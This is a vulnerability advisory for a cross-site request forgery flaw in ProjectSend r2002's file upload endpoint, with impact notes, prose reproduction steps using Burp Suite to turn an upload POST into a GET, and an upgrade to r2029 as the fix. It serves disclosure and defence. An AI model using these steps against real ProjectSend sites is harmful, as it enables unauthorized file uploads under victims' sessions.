ProjectSend Cross-Site Request Forgery Vulnerability in File Upload Component

A cross-site request forgery (CSRF) vulnerability has been identified in ProjectSend version r2002. The issue arises in the file upload functionality within upload.php, where the absence of proper CSRF protection allows attackers to exploit the endpoint. The vulnerability can be triggered remotely by manipulating HTTP methods, converting a POST request into a GET request, and uploading files without the user's consent. This exploitation takes advantage of the lack of validation for requests, enabling unauthorized file uploads using an authenticated user's session.

Impact

Exploitation of this vulnerability allows for unauthorized file uploads on behalf of an authenticated user. Depending on the uploaded content and the application's file handling policies, this could lead to the execution of malicious files, such as web shells, or cause storage abuse and denial-of-service conditions.

Reproduction

To reproduce this vulnerability, log into ProjectSend as a user with upload privileges. Capture a legitimate POST upload request using a web proxy tool like Burp Suite. Then, modify the request in Burp Repeater to convert it into a GET request, ensuring that all necessary upload parameters are included. Send the modified request and observe the successful file upload, which confirms the vulnerability.

Remediation

Users are advised to upgrade to ProjectSend version r2029, which addresses this vulnerability by restoring proper CSRF validation on the file upload endpoint. The updated version is available for download from the ProjectSend GitHub repository.